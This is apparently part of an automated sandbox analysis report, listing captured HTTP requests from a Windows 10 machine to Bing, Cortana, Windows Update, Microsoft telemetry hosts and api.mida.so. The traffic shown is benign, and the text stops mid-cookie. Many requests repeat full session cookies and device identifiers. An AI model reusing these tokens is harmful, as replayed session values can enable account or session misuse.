          Source: global trafficHTTP traffic detected: GET /event/addv3 HTTP/1.1host: api.mida.souser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
          Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=efHf3EnMDEXDW81&MD=nxOpV6m7 HTTP/1.1host: slscr.update.microsoft.comaccept: */*user-agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33accept-encoding: identity
          Source: global trafficHTTP traffic detected: GET /rp/Q0J3WqtOxBbLnp5iTXu__jsZq6o.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=68baa303&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; TOptOut=1; ak_bmsc=A88CDCB57762C2831119E8D19390832D~000000000000000000000000000000~YAAQFthUuAcZ0i+XAQAALpzqRhwwv8dujg5AfSbMiYGu/1ZsIZ4Sjvz59ZCkaYjouGk3AKmkBsJw3nJzEaWbGZthLzpJX2+IRoIG6FzSq1cPK5ICfT6HzNAmdQbK/vFAdR1YHvUOm0LBH1jgvYVkqecPdpQ6Kwc+ZLW7D+t/NUlrxUx0Z5O8k7S/Vrisiu6NEzpwwnTEG7gunBDJZyI1Wqbfg0hL4J34Uv76z24fC8x9zWRukEZQYs0TJXhI/UHDY2edd86ZLYcXsbmij6mSrXv7uqH6dGH+KVse0ALE74ijMXCycVrRQ9Wve6c3JgV0atfbVKkOHuKgYbEaOChW4gAKXMIR8k4wKZzQQzhSqWF9d6CR5J0yy3AdKLL+q6Hg69reZU7lVQ==; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
          Source: global trafficHTTP traffic detected: GET /apc/trans.gif?3844ee3cf6384732cbb180eff465a0f5 HTTP/1.1host: 066f6226a6a573987e5b4e67deb7f7c1.azr.footprintdns.comorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
          Source: global trafficHTTP traffic detected: GET /apc/trans.gif?20151eb8d2107198e0101d250094ba7a HTTP/1.1host: 066f6226a6a573987e5b4e67deb7f7c1.azr.footprintdns.comorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
          Source: global trafficHTTP traffic detected: GET /r.gif?MonitorID=asgw&rid=10f827eb2852c1aeef4e06e98f297c5b&w3c=true&prot=https:&v=20190506&DATA=[{%22RequestID%22:%22t-ring-fallback-s2.msedge.net%22,%22Object%22:%22trans.gif%22,%22Conn%22:%22cold%22,%22Result%22:688,%22T%22:1},{%22RequestID%22:%22t-ring-fallback-s2.msedge.net%22,%22Object%22:%22trans.gif%22,%22Conn%22:%22warm%22,%22Result%22:139,%22T%22:1},{%22RequestID%22:%22l-ring.msedge.net%22,%22Object%22:%22trans.gif%22,%22Conn%22:%22cold%22,%22Result%22:655,%22T%22:1},{%22RequestID%22:%22l-ring.msedge.net%22,%22Object%22:%22trans.gif%22,%22Conn%22:%22warm%22,%22Result%22:129,%22T%22:1},{%22RequestID%22:%22066f6226a6a573987e5b4e67deb7f7c1%22,%22Object%22:%22trans.gif%22,%22Conn%22:%22cold%22,%22Result%22:32200,%22T%22:128,%22Rip%22:%22%20212.102.41.0%22,%22Ep%22:%22%20ch1prdapp01%22,%22Mn%22:%22%20ch1app012%22},{%22RequestID%22:%22066f6226a6a573987e5b4e67deb7f7c1%22,%22Object%22:%22trans.gif%22,%22Conn%22:%22warm%22,%22Result%22:158,%22T%22:128,%22Rip%22:%22%20212.102.41.0%22,%22Ep%22:%22%20ch1prdapp01%22,%22Mn%22:%22%20ch1app012%22}] HTTP/1.1host: fp.msedge.netorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
          Source: global trafficHTTP traffic detected: GET /rp/Q_a1-NQcI9jzDQWCGyf-VjN20v4.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=68baa303&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; TOptOut=1; ak_bmsc=A88CDCB57762C2831119E8D19390832D~000000000000000000000000000000~YAAQFthUuAcZ0i+XAQAALpzqRhwwv8dujg5AfSbMiYGu/1ZsIZ4Sjvz59ZCkaYjouGk3AKmkBsJw3nJzEaWbGZthLzpJX2+IRoIG6FzSq1cPK5ICfT6HzNAmdQbK/vFAdR1YHvUOm0LBH1jgvYVkqecPdpQ6Kwc+ZLW7D+t/NUlrxUx0Z5O8k7S/Vrisiu6NEzpwwnTEG7gunBDJZyI1Wqbfg0hL4J34Uv76z24fC8x9zWRukEZQYs0TJXhI/UHDY2edd86ZLYcXsbmij6mSrXv7uqH6dGH+KVse0ALE74ijMXCycVrRQ9Wve6c3JgV0atfbVKkOHuKgYbEaOChW4gAKXMIR8k4wKZzQQzhSqWF9d6CR5J0yy3AdKLL+q6Hg69reZU7lVQ==; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
          Source: global trafficHTTP traffic detected: GET /rp/S-1Sin9hxjW1LkijyZiLBA_FHdk.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=68baa303&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; TOptOut=1; ak_bmsc=A88CDCB57762C2831119E8D19390832D~000000000000000000000000000000~YAAQFthUuAcZ0i+XAQAALpzqRhwwv8dujg5AfSbMiYGu/1ZsIZ4Sjvz59ZCkaYjouGk3AKmkBsJw3nJzEaWbGZthLzpJX2+IRoIG6FzSq1cPK5ICfT6HzNAmdQbK/vFAdR1YHvUOm0LBH1jgvYVkqecPdpQ6Kwc+ZLW7D+t/NUlrxUx0Z5O8k7S/Vrisiu6NEzpwwnTEG7gunBDJZyI1Wqbfg0hL4J34Uv76z24fC8x9zWRukEZQYs0TJXhI/UHDY2edd86ZLYcXsbmij6mSrXv7uqH6dGH+KVse0ALE74ijMXCycVrRQ9Wve6c3JgV0atfbVKkOHuKgYbEaOChW4gAKXMIR8k4wKZzQQzhSqWF9d6CR5J0yy3AdKLL+q6Hg69reZU7lVQ==; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
          Source: global trafficHTTP traffic detected: GET /rp/TdECMV0TRBVEcANtOCAjiC_gQ1M.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=68baa303&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; TOptOut=1; ak_bmsc=A88CDCB57762C2831119E8D19390832D~000000000000000000000000000000~YAAQFthUuAcZ0i+XAQAALpzqRhwwv8dujg5AfSbMiYGu/1ZsIZ4Sjvz59ZCkaYjouGk3AKmkBsJw3nJzEaWbGZthLzpJX2+IRoIG6FzSq1cPK5ICfT6HzNAmdQbK/vFAdR1YHvUOm0LBH1jgvYVkqecPdpQ6Kwc+ZLW7D+t/NUlrxUx0Z5O8k7S/Vrisiu6NEzpwwnTEG7gunBDJZyI1Wqbfg0hL4J34Uv76z24fC8x9zWRukEZQYs0TJXhI/UHDY2edd86ZLYcXsbmij6mSrXv7uqH6dGH+KVse0ALE74ijMXCycVrRQ9Wve6c3JgV0atfbVKkOHuKgYbEaOChW4gAKXMIR8k4wKZzQQzhSqWF9d6CR5J0yy3AdKLL+q6Hg69reZU7lVQ==; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
          Source: global trafficHTTP traffic detected: GET /rp/Uicjz5_Idvl9FRKtwKPHILZoadU.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=68baa303&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; TOptOut=1; ak_bmsc=A88CDCB57762C2831119E8D19390832D~000000000000000000000000000000~YAAQFthUuAcZ0i+XAQAALpzqRhwwv8dujg5AfSbMiYGu/1ZsIZ4Sjvz59ZCkaYjouGk3AKmkBsJw3nJzEaWbGZthLzpJX2+IRoIG6FzSq1cPK5ICfT6HzNAmdQbK/vFAdR1YHvUOm0LBH1jgvYVkqecPdpQ6Kwc+ZLW7D+t/NUlrxUx0Z5O8k7S/Vrisiu6NEzpwwnTEG7gunBDJZyI1Wqbfg0hL4J34Uv76z24fC8x9zWRukEZQYs0TJXhI/UHDY2edd86ZLYcXsbmij6mSrXv7uqH6dGH+KVse0ALE74ijMXCycVrRQ9Wve6c3JgV0atfbVKkOHuKgYbEaOChW4gAKXMIR8k4wKZzQQzhSqWF9d6CR5J0yy3AdKLL+q6Hg69reZU7lVQ==; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
          Source: global trafficHTTP traffic detected: GET /rp/XUoKWXdZQS2iuOnv0a_-gwXn0RY.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=68baa303&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; TOptOut=1; ak_bmsc=A88CDCB57762C2831119E8D19390832D~000000000000000000000000000000~YAAQFthUuAcZ0i+XAQAALpzqRhwwv8dujg5AfSbMiYGu/1ZsIZ4Sjvz59ZCkaYjouGk3AKmkBsJw3nJzEaWbGZthLzpJX2+IRoIG6FzSq1cPK5ICfT6HzNAmdQbK/vFAdR1YHvUOm0LBH1jgvYVkqecPdpQ6Kwc+ZLW7D+t/NUlrxUx0Z5O8k7S/Vrisiu6NEzpwwnTEG7gunBDJZyI1Wqbfg0hL4J34Uv76z24fC8x9zWRukEZQYs0TJXhI/UHDY2edd86ZLYcXsbmij6mSrXv7uqH6dGH+KVse0ALE74ijMXCycVrRQ9Wve6c3JgV0atfbVKkOHuKgYbEaOChW4gAKXMIR8k4wKZzQQzhSqWF9d6CR5J0yy3AdKLL+q6Hg69reZU7lVQ==; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
          Source: global trafficHTTP traffic detected: GET /rp/YdkRJN1Cgndw2b5FyfmuFrQJnME.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=68baa303&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; TOptOut=1; ak_bmsc=A88CDCB57762C2831119E8D19390832D~000000000000000000000000000000~YAAQFthUuAcZ0i+XAQAALpzqRhwwv8dujg5AfSbMiYGu/1ZsIZ4Sjvz59ZCkaYjouGk3AKmkBsJw3nJzEaWbGZthLzpJX2+IRoIG6FzSq1cPK5ICfT6HzNAmdQbK/vFAdR1YHvUOm0LBH1jgvYVkqecPdpQ6Kwc+ZLW7D+t/NUlrxUx0Z5O8k7S/Vrisiu6NEzpwwnTEG7gunBDJZyI1Wqbfg0hL4J34Uv76z24fC8x9zWRukEZQYs0TJXhI/UHDY2edd86ZLYcXsbmij6mSrXv7uqH6dGH+KVse0ALE74ijMXCycVrRQ9Wve6c3JgV0atfbVKkOHuKgYbEaOChW4gAKXMIR8k4wKZzQQzhSqWF9d6CR5J0yy3AdKLL+q6Hg69reZU7lVQ==; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
          Source: global trafficHTTP traffic detected: GET /rp/Z9hYXc38AnqyLF2U6SIx7fPVgp0.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=68baa303&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; TOptOut=1; ak_bmsc=A88CDCB57762C2831119E8D19390832D~000000000000000000000000000000~YAAQFthUuAcZ0i+XAQAALpzqRhwwv8dujg5AfSbMiYGu/1ZsIZ4Sjvz59ZCkaYjouGk3AKmkBsJw3nJzEaWbGZthLzpJX2+IRoIG6FzSq1cPK5ICfT6HzNAmdQbK/vFAdR1YHvUOm0LBH1jgvYVkqecPdpQ6Kwc+ZLW7D+t/NUlrxUx0Z5O8k7S/Vrisiu6NEzpwwnTEG7gunBDJZyI1Wqbfg0hL4J34Uv76z24fC8x9zWRukEZQYs0TJXhI/UHDY2edd86ZLYcXsbmij6mSrXv7uqH6dGH+KVse0ALE74ijMXCycVrRQ9Wve6c3JgV0atfbVKkOHuKgYbEaOChW4gAKXMIR8k4wKZzQQzhSqWF9d6CR5J0yy3AdKLL+q6Hg69reZU7lVQ==; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
          Source: global trafficHTTP traffic detected: GET /rp/ZGYsYc-4cfWAUrRQfDPHboO8Xgc.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=68baa303&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; TOptOut=1; ak_bmsc=A88CDCB57762C2831119E8D19390832D~000000000000000000000000000000~YAAQFthUuAcZ0i+XAQAALpzqRhwwv8dujg5AfSbMiYGu/1ZsIZ4Sjvz59ZCkaYjouGk3AKmkBsJw3nJzEaWbGZthLzpJX2+IRoIG6FzSq1cPK5ICfT6HzNAmdQbK/vFAdR1YHvUOm0LBH1jgvYVkqecPdpQ6Kwc+ZLW7D+t/NUlrxUx0Z5O8k7S/Vrisiu6NEzpwwnTEG7gunBDJZyI1Wqbfg0hL4J34Uv76z24fC8x9zWRukEZQYs0TJXhI/UHDY2edd86ZLYcXsbmij6mSrXv7uqH6dGH+KVse0ALE74ijMXCycVrRQ9Wve6c3JgV0atfbVKkOHuKgYbEaOChW4gAKXMIR8k4wKZzQQzhSqWF9d6CR5J0yy3AdKLL+q6Hg69reZU7lVQ==; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
          Source: global trafficHTTP traffic detected: GET /rp/dXH4UJXiG6BhYx2KONGGI7yr8wE.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=68baa303&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; TOptOut=1; ak_bmsc=A88CDCB57762C2831119E8D19390832D~000000000000000000000000000000~YAAQFthUuAcZ0i+XAQAALpzqRhwwv8dujg5AfSbMiYGu/1ZsIZ4Sjvz59ZCkaYjouGk3AKmkBsJw3nJzEaWbGZthLzpJX2+IRoIG6FzSq1cPK5ICfT6HzNAmdQbK/vFAdR1YHvUOm0LBH1jgvYVkqecPdpQ6Kwc+ZLW7D+t/NUlrxUx0Z5O8k7S/Vrisiu6NEzpwwnTEG7gunBDJZyI1Wqbfg0hL4J34Uv76z24fC8x9zWRukEZQYs0TJXhI/UHDY2edd86ZLYcXsbmij6mSrXv7uqH6dGH+KVse0ALE74ijMXCycVrRQ9Wve6c3JgV0atfbVKkOHuKgYbEaOChW4gAKXMIR8k4wKZzQQzhSqWF9d6CR5J0yy3AdKLL+q6Hg69reZU7lVQ==; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
          Source: global trafficHTTP traffic detected: GET /rp/dae1eD06shOtvLXODcWefBj-c4Q.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=68baa303&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; TOptOut=1; ak_bmsc=A88CDCB57762C2831119E8D19390832D~000000000000000000000000000000~YAAQFthUuAcZ0i+XAQAALpzqRhwwv8dujg5AfSbMiYGu/1ZsIZ4Sjvz59ZCkaYjouGk3AKmkBsJw3nJzEaWbGZthLzpJX2+IRoIG6FzSq1cPK5ICfT6HzNAmdQbK/vFAdR1YHvUOm0LBH1jgvYVkqecPdpQ6Kwc+ZLW7D+t/NUlrxUx0Z5O8k7S/Vrisiu6NEzpwwnTEG7gunBDJZyI1Wqbfg0hL4J34Uv76z24fC8x9zWRukEZQYs0TJXhI/UHDY2edd86ZLYcXsbmij6mSrXv7uqH6dGH+KVse0ALE74ijMXCycVrRQ9Wve6c3JgV0atfbVKkOHuKgYbEaOChW4gAKXMIR8k4wKZzQQzhSqWF9d6CR5J0yy3AdKLL+q6Hg69reZU7lVQ==; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
          Source: global trafficHTTP traffic detected: GET /rp/eEeyUDaPc605RXeeN1fbn7yWGC0.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=68baa303&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; TOptOut=1; ak_bmsc=A88CDCB57762C2831119E8D19390832D~000000000000000000000000000000~YAAQFthUuAcZ0i+XAQAALpzqRhwwv8dujg5AfSbMiYGu/1ZsIZ4Sjvz59ZCkaYjouGk3AKmkBsJw3nJzEaWbGZthLzpJX2+IRoIG6FzSq1cPK5ICfT6HzNAmdQbK/vFAdR1YHvUOm0LBH1jgvYVkqecPdpQ6Kwc+ZLW7D+t/NUlrxUx0Z5O8k7S/Vrisiu6NEzpwwnTEG7gunBDJZyI1Wqbfg0hL4J34Uv76z24fC8x9zWRukEZQYs0TJXhI/UHDY2edd86ZLYcXsbmij6mSrXv7uqH6dGH+KVse0ALE74ijMXCycVrRQ9Wve6c3JgV0atfbVKkOHuKgYbEaOChW4gAKXMIR8k4wKZzQQzhSqWF9d6CR5J0yy3AdKLL+q6Hg69reZU7lVQ==; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
          Source: global trafficHTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=ed&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=2&cvid=2ea0fe5c3bd8409b9218a925f0ddddff&ig=7e4d9a0976614cab8c56efbf6de5c38b HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=68baa303&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; TOptOut=1; ak_bmsc=A88CDCB57762C2831119E8D19390832D~000000000000000000000000000000~YAAQFthUuAcZ0i+XAQAALpzqRhwwv8dujg5AfSbMiYGu/1ZsIZ4Sjvz59ZCkaYjouGk3AKmkBsJw3nJzEaWbGZthLzpJX2+IRoIG6FzSq1cPK5ICfT6HzNAmdQbK/vFAdR1YHvUOm0LBH1jgvYVkqecPdpQ6Kwc+ZLW7D+t/NUlrxUx0Z5O8k7S/Vrisiu6NEzpwwnTEG7gunBDJZyI1Wqbfg0hL4J34Uv76z24fC8x
